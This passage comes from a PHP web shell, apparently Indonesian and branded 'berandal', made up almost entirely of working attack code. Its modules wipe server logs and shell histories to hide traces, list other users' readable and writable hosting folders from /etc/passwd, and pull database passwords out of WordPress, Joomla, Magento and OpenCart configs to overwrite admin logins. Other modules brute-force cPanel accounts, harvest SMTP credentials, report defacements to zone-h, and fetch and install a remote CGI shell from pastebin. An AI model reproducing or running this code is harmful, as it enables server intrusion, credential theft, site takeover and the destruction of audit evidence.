  1314. passthru("rm -rf /etc/wtmp");
  1315. passthru("rm -rf /etc/utmp");
  1316. passthru("rm -rf $HISTFILE");
  1317. passthru("rm -rf /var/log/lastlog");
  1318. passthru("rm -rf /var/log/wtmp");
  1319.  
  1320.  
  1321. system("rm -rf /tmp/logs");
  1322. sleep(2);
  1323. echo'<br>Deleting .../tmp/logs ';
  1324. sleep(2);
  1325.  
  1326. system("rm -rf /root/.bash_history");
  1327. sleep(2);
  1328. echo'<p>Deleting .../root/.bash_history </p>';
  1329.  
  1330. system("rm -rf /root/.ksh_history");
  1331. sleep(2);
  1332. echo'<p>Deleting .../root/.ksh_history </p>';
  1333.  
  1334. system("rm -rf /root/.bash_logout");
  1335. sleep(2);
  1336. echo'<p>Deleting .../root/.bash_logout </p>';
  1337.  
  1338. system("rm -rf /usr/local/apache/logs");
  1339. sleep(2);
  1340. echo'<p>Deleting .../usr/local/apache/logs </p>';
  1341.  
  1342. system("rm -rf /usr/local/apache/log");
  1343. sleep(2);
  1344. echo'<p>Deleting .../usr/local/apache/log </p>';
  1345.  
  1346. system("rm -rf /var/apache/logs");
  1347. sleep(2);
  1348. echo'<p>Deleting .../var/apache/logs </p>';
  1349.  
  1350. system("rm -rf /var/apache/log");
  1351. sleep(2);
  1352. echo'<p>Deleting .../var/apache/log </p>';
  1353.  
  1354. system("rm -rf /var/run/utmp");
  1355. sleep(2);
  1356. echo'<p>Deleting .../var/run/utmp </p>';
  1357.  
  1358. system("rm -rf /var/logs");
  1359. sleep(2);
  1360. echo'<p>Deleting .../var/logs </p>';
  1361.  
  1362. system("rm -rf /var/log");
  1363. sleep(2);
  1364. echo'<p>Deleting .../var/log </p>';
  1365.  
  1366. system("rm -rf /var/adm");
  1367. sleep(2);
  1368. echo'<p>Deleting .../var/adm </p>';
  1369.  
  1370. system("rm -rf /etc/wtmp");
  1371. sleep(2);
  1372. echo'<p>Deleting .../etc/wtmp </p>';
  1373.  
  1374. system("rm -rf /etc/utmp");
  1375. sleep(2);
  1376. echo'<p>Deleting .../etc/utmp </p>';
  1377.  
  1378. system("rm -rf $HISTFILE");
  1379. sleep(2);
  1380. echo'<p>Deleting ...$HISTFILE </p>';
  1381.  
  1382. system("rm -rf /var/log/lastlog");
  1383. sleep(2);
  1384. echo'<p>Deleting .../var/log/lastlog </p>';
  1385.  
  1386. system("rm -rf /var/log/wtmp");
  1387. sleep(2);
  1388. echo'<p>Deleting .../var/log/wtmp </p>';
  1389.  
  1390. sleep(4);
  1391.  
  1392. echo '<hr color="white"><br><br><p>Your Traces Has Been Successfully Deleted ... From the Server';
  1393. echo"</td></tr></table>";
  1394. } elseif($_GET['do'] == 'jumping') {
  1395. $i = 0;
  1396. echo "<div class='margin: 5px auto;'>";
  1397. if(preg_match("/hsphere/", $dir)) {
  1398. $urls = explode("\r\n", $_POST['url']);
  1399. if(isset($_POST['jump'])) {
  1400. echo "<pre>";
  1401. foreach($urls as $url) {
  1402. $url = str_replace(array("http://","www."), "", strtolower($url));
  1403. $etc = "/etc/passwd";
  1404. $f = fopen($etc,"r");
  1405. while($gets = fgets($f)) {
  1406. $pecah = explode(":", $gets);
  1407. $user = $pecah[0];
  1408. $dir_user = "/hsphere/local/home/$user";
  1409. if(is_dir($dir_user) === true) {
  1410. $url_user = $dir_user."/".$url;
  1411. if(is_readable($url_user)) {
  1412. $i++;
  1413. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1414. if(is_writable($url_user)) {
  1415. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1416. }
  1417. echo $jrw."<br>";
  1418. }
  1419. }
  1420. }
  1421. }
  1422. if($i == 0) {
  1423. } else {
  1424. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1425. }
  1426. echo "</pre>";
  1427. } else {
  1428. echo '<center>
  1429. <form method="post">
  1430. List Domains: <br>
  1431. <textarea name="url" style="width: 500px; height: 250px;">';
  1432. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1433. while($getss = fgets($fp)) {
  1434. echo $getss;
  1435. }
  1436. echo '</textarea><br>
  1437. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1438. </form></center>';
  1439. }
  1440. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  1441. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  1442. $urls = explode("\r\n", $_POST['url']);
  1443. if(isset($_POST['jump'])) {
  1444. echo "<pre>";
  1445. foreach($urls as $url) {
  1446. $url = str_replace("www.", "", $url);
  1447. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  1448. if(is_dir($web_vh) === true) {
  1449. if(is_readable($web_vh)) {
  1450. $i++;
  1451. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1452. if(is_writable($web_vh)) {
  1453. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1454. }
  1455. echo $jrw."<br>";
  1456. }
  1457. }
  1458. }
  1459. if($i == 0) {
  1460. } else {
  1461. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1462. }
  1463. echo "</pre>";
  1464. } else {
  1465. echo '<center>
  1466. <form method="post">
  1467. List Domains: <br>
  1468. <textarea name="url" style="width: 500px; height: 250px;">';
  1469. bing("ip:$ip");
  1470. echo '</textarea><br>
  1471. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1472. </form></center>';
  1473. }
  1474. } else {
  1475. echo "<pre>";
  1476. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1477. while($passwd = fgets($etc)) {
  1478. if($passwd == '' || !$etc) {
  1479. echo "<font color=red>Can't read /etc/passwd</font>";
  1480. } else {
  1481. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1482. foreach($user_jumping[1] as $user_berandal_jump) {
  1483. $user_jumping_dir = "/home/$user_berandal_jump/public_html";
  1484. if(is_readable($user_jumping_dir)) {
  1485. $i++;
  1486. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1487. if(is_writable($user_jumping_dir)) {
  1488. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1489. }
  1490. echo $jrw;
  1491. if(function_exists('posix_getpwuid')) {
  1492. $domain_jump = file_get_contents("/etc/named.conf");
  1493. if($domain_jump == '') {
  1494. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1495. } else {
  1496. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1497. foreach($domains_jump[1] as $dj) {
  1498. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1499. $user_jumping_url = $user_jumping_url['name'];
  1500. if($user_jumping_url == $user_berandal_jump) {
  1501. echo " => ( <u>$dj</u> )<br>";
  1502. break;
  1503. }
  1504. }
  1505. }
  1506. } else {
  1507. echo "<br>";
  1508. }
  1509. }
  1510. }
  1511. }
  1512. }
  1513. if($i == 0) {
  1514. } else {
  1515. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1516. }
  1517. echo "</pre>";
  1518. }
  1519. echo "</div>";
  1520. } elseif($_GET['do'] == 'auto_edit_user') {
  1521. if($_POST['hajar']) {
  1522. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1523. echo "username atau password harus lebih dari 6 karakter";
  1524. } else {
  1525. $user_baru = $_POST['user_baru'];
  1526. $pass_baru = md5($_POST['pass_baru']);
  1527. $conf = $_POST['config_dir'];
  1528. $scan_conf = scandir($conf);
  1529. foreach($scan_conf as $file_conf) {
  1530. if(!is_file("$conf/$file_conf")) continue;
  1531. $config = file_get_contents("$conf/$file_conf");
  1532. if(preg_match("/JConfig|joomla/",$config)) {
  1533. $dbhost = ambilkata($config,"host = '","'");
  1534. $dbuser = ambilkata($config,"user = '","'");
  1535. $dbpass = ambilkata($config,"password = '","'");
  1536. $dbname = ambilkata($config,"db = '","'");
  1537. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1538. $prefix = $dbprefix."users";
  1539. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1540. $db = mysql_select_db($dbname);
  1541. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1542. $result = mysql_fetch_array($q);
  1543. $id = $result['id'];
  1544. $site = ambilkata($config,"sitename = '","'");
  1545. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1546. echo "Config => ".$file_conf."<br>";
  1547. echo "CMS => Joomla<br>";
  1548. if($site == '') {
  1549. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1550. } else {
  1551. echo "Sitename => $site<br>";
  1552. }
  1553. if(!$update OR !$conn OR !$db) {
  1554. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1555. } else {
  1556. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1557. }
  1558. mysql_close($conn);
  1559. } elseif(preg_match("/WordPress/",$config)) {
  1560. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1561. $dbuser = ambilkata($config,"DB_USER', '","'");
  1562. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1563. $dbname = ambilkata($config,"DB_NAME', '","'");
  1564. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1565. $prefix = $dbprefix."users";
  1566. $option = $dbprefix."options";
  1567. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1568. $db = mysql_select_db($dbname);
  1569. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1570. $result = mysql_fetch_array($q);
  1571. $id = $result[ID];
  1572. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1573. $result2 = mysql_fetch_array($q2);
  1574. $target = $result2[option_value];
  1575. if($target == '') {
  1576. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1577. } else {
  1578. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1579. }
  1580. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1581. echo "Config => ".$file_conf."<br>";
  1582. echo "CMS => Wordpress<br>";
  1583. echo $url_target;
  1584. if(!$update OR !$conn OR !$db) {
  1585. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1586. } else {
  1587. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1588. }
  1589. mysql_close($conn);
  1590. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1591. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1592. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1593. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1594. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1595. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1596. $prefix = $dbprefix."admin_user";
  1597. $option = $dbprefix."core_config_data";
  1598. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1599. $db = mysql_select_db($dbname);
  1600. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1601. $result = mysql_fetch_array($q);
  1602. $id = $result[user_id];
  1603. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1604. $result2 = mysql_fetch_array($q2);
  1605. $target = $result2[value];
  1606. if($target == '') {
  1607. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1608. } else {
  1609. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1610. }
  1611. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1612. echo "Config => ".$file_conf."<br>";
  1613. echo "CMS => Magento<br>";
  1614. echo $url_target;
  1615. if(!$update OR !$conn OR !$db) {
  1616. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1617. } else {
  1618. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1619. }
  1620. mysql_close($conn);
  1621. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1622. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1623. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1624. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1625. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1626. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1627. $prefix = $dbprefix."user";
  1628. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1629. $db = mysql_select_db($dbname);
  1630. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1631. $result = mysql_fetch_array($q);
  1632. $id = $result[user_id];
  1633. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1634. if($target == '') {
  1635. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1636. } else {
  1637. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1638. }
  1639. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1640. echo "Config => ".$file_conf."<br>";
  1641. echo "CMS => OpenCart<br>";
  1642. echo $url_target;
  1643. if(!$update OR !$conn OR !$db) {
  1644. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1645. } else {
  1646. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1647. }
  1648. mysql_close($conn);
  1649. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1650. $dbhost = ambilkata($config,'server = "','"');
  1651. $dbuser = ambilkata($config,'username = "','"');
  1652. $dbpass = ambilkata($config,'password = "','"');
  1653. $dbname = ambilkata($config,'database = "','"');
  1654. $prefix = "users";
  1655. $option = "identitas";
  1656. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1657. $db = mysql_select_db($dbname);
  1658. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1659. $result = mysql_fetch_array($q);
  1660. $target = $result[alamat_website];
  1661. if($target == '') {
  1662. $target2 = $result[url];
  1663. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1664. if($target2 == '') {
  1665. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1666. } else {
  1667. $cek_login3 = file_get_contents("$target2/adminweb/");
  1668. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1669. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1670. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1671. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1672. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1673. } else {
  1674. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1675. }
  1676. }
  1677. } else {
  1678. $cek_login = file_get_contents("$target/adminweb/");
  1679. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1680. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1681. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1682. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1683. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1684. } else {
  1685. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1686. }
  1687. }
  1688. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1689. echo "Config => ".$file_conf."<br>";
  1690. echo "CMS => Lokomedia<br>";
  1691. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1692. echo $url_target2;
  1693. } else {
  1694. echo $url_target;
  1695. }
  1696. if(!$update OR !$conn OR !$db) {
  1697. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1698. } else {
  1699. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1700. }
  1701. mysql_close($conn);
  1702. }
  1703. }
  1704. }
  1705. } else {
  1706. echo "<center>
  1707. <h1>Auto Edit User Config</h1>
  1708. <form method='post'>
  1709. DIR Config: <br>
  1710. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1711. Set User & Pass: <br>
  1712. <input type='text' name='user_baru' value='berandal' placeholder='user_baru'><br>
  1713. <input type='text' name='pass_baru' value='berandal' placeholder='pass_baru'><br>
  1714. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1715. </form>
  1716. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1717. ";
  1718. }
  1719. } elseif($_GET['do'] == 'cpanel') {
  1720. if($_POST['crack']) {
  1721. $usercp = explode("\r\n", $_POST['user_cp']);
  1722. $passcp = explode("\r\n", $_POST['pass_cp']);
  1723. $i = 0;
  1724. foreach($usercp as $ucp) {
  1725. foreach($passcp as $pcp) {
  1726. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1727. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1728. } else {
  1729. $_SESSION[$ucp] = "1";
  1730. $_SESSION[$pcp] = "1";
  1731. if($ucp == '' || $pcp == '') {
  1732.  
  1733. } else {
  1734. $i++;
  1735. if(function_exists('posix_getpwuid')) {
  1736. $domain_cp = file_get_contents("/etc/named.conf");
  1737. if($domain_cp == '') {
  1738. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1739. } else {
  1740. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1741. foreach($domains_cp[1] as $dj) {
  1742. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1743. $user_cp_url = $user_cp_url['name'];
  1744. if($user_cp_url == $ucp) {
  1745. $dom = "<a href='http://$dj/' target='_blank'><font color=cyan>$dj</font></a>";
  1746. break;
  1747. }
  1748. }
  1749. }
  1750. } else {
  1751. $dom = "<font color=red>function is Disable by system</font>";
  1752. }
  1753. echo "username (<font color=cyan>$ucp</font>) password (<font color=cyan>$pcp</font>) domain ($dom)<br>";
  1754. }
  1755. }
  1756. }
  1757. }
  1758. }
  1759. if($i == 0) {
  1760. } else {
  1761. echo "<br>sukses nyolong ".$i." Cpanel by <font color=cyan>berandal.</font>";
  1762. }
  1763. } else {
  1764. echo "<center>
  1765. <form method='post'>
  1766. USER: <br>
  1767. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1768. $_usercp = fopen("/etc/passwd","r");
  1769. while($getu = fgets($_usercp)) {
  1770. if($getu == '' || !$_usercp) {
  1771. echo "<font color=red>Can't read /etc/passwd</font>";
  1772. } else {
  1773. preg_match_all("/(.*?):x:/", $getu, $u);
  1774. foreach($u[1] as $user_cp) {
  1775. if(is_dir("/home/$user_cp/public_html")) {
  1776. echo "$user_cp\n";
  1777. }
  1778. }
  1779. }
  1780. }
  1781. echo "</textarea><br>
  1782. PASS: <br>
  1783. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1784. function cp_pass($dir) {
  1785. $pass = "";
  1786. $dira = scandir($dir);
  1787. foreach($dira as $dirb) {
  1788. if(!is_file("$dir/$dirb")) continue;
  1789. $ambil = file_get_contents("$dir/$dirb");
  1790. if(preg_match("/WordPress/", $ambil)) {
  1791. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1792. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1793. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1794. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1795. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1796. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1797. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1798. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1799. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1800. } elseif(preg_match("/^[client]$/", $ambil)) {
  1801. preg_match("/password=(.*?)/", $ambil, $pass1);
  1802. if(preg_match('/"/', $pass1[1])) {
  1803. $pass1[1] = str_replace('"', "", $pass1[1]);
  1804. $pass .= $pass1[1]."\n";
  1805. } else {
  1806. $pass .= $pass1[1]."\n";
  1807. }
  1808. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1809. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1810. }
  1811. }
  1812. echo $pass;
  1813. }
  1814. $cp_pass = cp_pass($dir);
  1815. echo $cp_pass;
  1816. echo "</textarea><br>
  1817. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1818. </form>
  1819. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1820. }
  1821. } elseif($_GET['do'] == 'smtp') {
  1822. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1823. function scj($dir) {
  1824. $dira = scandir($dir);
  1825. foreach($dira as $dirb) {
  1826. if(!is_file("$dir/$dirb")) continue;
  1827. $ambil = file_get_contents("$dir/$dirb");
  1828. $ambil = str_replace("$", "", $ambil);
  1829. if(preg_match("/JConfig|joomla/", $ambil)) {
  1830. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1831. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1832. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1833. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1834. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1835. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1836. echo "SMTP Host: <font color=cyan>$smtp_host</font><br>";
  1837. echo "SMTP port: <font color=cyan>$smtp_port</font><br>";
  1838. echo "SMTP user: <font color=cyan>$smtp_user</font><br>";
  1839. echo "SMTP pass: <font color=cyan>$smtp_pass</font><br>";
  1840. echo "SMTP auth: <font color=cyan>$smtp_auth</font><br>";
  1841. echo "SMTP secure: <font color=cyan>$smtp_secure</font><br><br>";
  1842. }
  1843. }
  1844. }
  1845. $smpt_hunter = scj($dir);
  1846. echo $smpt_hunter;
  1847. } elseif($_GET['do'] == 'zoneh') {
  1848. if($_POST['submit']) {
  1849. $domain = explode("\r\n", $_POST['url']);
  1850. $nick = $_POST['nick'];
  1851. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1852. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1853. function zoneh($url,$nick) {
  1854. $ch = curl_init("http://www.zone-h.com/notify/single");
  1855. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1856. curl_setopt($ch, CURLOPT_POST, true);
  1857. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1858. return curl_exec($ch);
  1859. curl_close($ch);
  1860. }
  1861. foreach($domain as $url) {
  1862. $zoneh = zoneh($url,$nick);
  1863. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1864. echo "$url -> <font color=cyan>OK</font><br>";
  1865. } else {
  1866. echo "$url -> <font color=red>ERROR</font><br>";
  1867. }
  1868. }
  1869. } else {
  1870. echo "<center><form method='post'>
  1871. <u>Defacer</u>: <br>
  1872. <input type='text' name='nick' size='50' value='berandal'><br>
  1873. <u>Domains</u>: <br>
  1874. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1875. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1876. </form>";
  1877. }
  1878. echo "</center>";
  1879. } elseif($_GET['do'] == 'cgi') {
  1880. $cgi_dir = mkdir('berandal_cgi', 0755);
  1881. $file_cgi = "berandal_cgi/cgi.izo";
  1882. $isi_htcgi = "AddHandler cgi-script .izo";
  1883. $htcgi = fopen(".htaccess", "w");
  1884. fwrite($htcgi, $isi_htcgi);
  1885. fclose($htcgi);
  1886. $cgi_script = getsource("https://pastebin.com/raw/3mW2wa7a");
  1887. $cgi = fopen($file_cgi, "w");
  1888. fwrite($cgi, $cgi_script);
  1889. fclose($cgi);
  1890. chmod($file_cgi, 0755);
  1891. echo "<iframe src='berandal_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1892. } elseif($_GET['do'] == 'fake_root') {
  1893. ob_start();
  1894. $cwd = getcwd();
  1895. $ambil_user = explode("/", $cwd);
  1896. $user = $ambil_user[2];
  1897. if($_POST['reverse']) {
  1898. $site = explode("\r\n", $_POST['url']);
  1899. $file = $_POST['file'];
  1900. foreach($site as $url) {
  1901. $cek = getsource("$url/~$user/$file");
  1902. if(preg_match("/hacked/i", $cek)) {
  1903. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=cyan>Fake Root!</font><br>";
  1904. }
  1905. }
  1906. } else {
  1907. echo "<center><form method='post'>
  1908. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1909. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1910. Domain: <br>
  1911. <textarea style='width: 450px; height: 250px;' name='url'>";
  1912. reverse($_SERVER['HTTP_HOST']);
  1913. echo "</textarea><br>
  1914. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1915. </form><br>
  1916. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1917. }
  1918. } elseif($_GET['do'] == 'adminer') {
  1919. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1920. function adminer($url, $isi) {
  1921. $fp = fopen($isi, "w");
  1922. $ch = curl_init();
  1923. curl_setopt($ch, CURLOPT_URL, $url);
  1924. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1925. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1926. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1927. curl_setopt($ch, CURLOPT_FILE, $fp);
  1928. return curl_exec($ch);
  1929. curl_close($ch);
  1930. fclose($fp);
  1931. ob_flush();
  1932. flush();
  1933. }
  1934. if(file_exists('adminer.php')) {
  1935. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1936. } else {
  1937. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1938. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1939. } else {
  1940. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1941. }
  1942. }
  1943. } elseif($_GET['do'] == 'phinfo')
  1944. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div>";}
  1945. elseif($_GET['act'] == 'newfile') {
  1946. if($_POST['new_save_file']) {
  1947. $newfile = htmlspecialchars($_POST['newfile']);
  1948. $fopen = fopen($newfile, "a+");
  1949. if($fopen) {
  1950. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1951. } else {
  1952. $act = "<font color=red>permission denied</font>";
  1953. }
  1954. }
  1955. echo $act;
  1956. echo "<form method='post'>
  1957. Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px;' height='10'>
  1958. <input type='submit' name='new_save_file' value='Submit'>
  1959. </form>";
  1960. } elseif($_GET['act'] == 'newfolder') {
  1961. if($_POST['new_save_folder']) {
  1962. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1963. if(!mkdir($new_folder)) {
  1964. $act = "<font color=red>permission denied</font>";
  1965. } else {
  1966. $act = "<script>window.location='?dir=".$dir."';</script>";
  1967. }
  1968. }
  1969. echo $act;
  1970. echo "<form method='post'>
  1971. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1972. <input type='submit' name='new_save_folder' value='Submit'>
  1973. </form>";
  1974. } elseif($_GET['act'] == 'rename_dir') {
  1975. if($_POST['dir_rename']) {
  1976. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1977. if($dir_rename) {
  1978. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1979. } else {
  1980. $act = "<font color=red>permission denied</font>";
  1981. }
  1982. echo "".$act."<br>";
  1983. }
  1984. echo "<form method='post'>
  1985. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1986. <input type='submit' name='dir_rename' value='rename'>
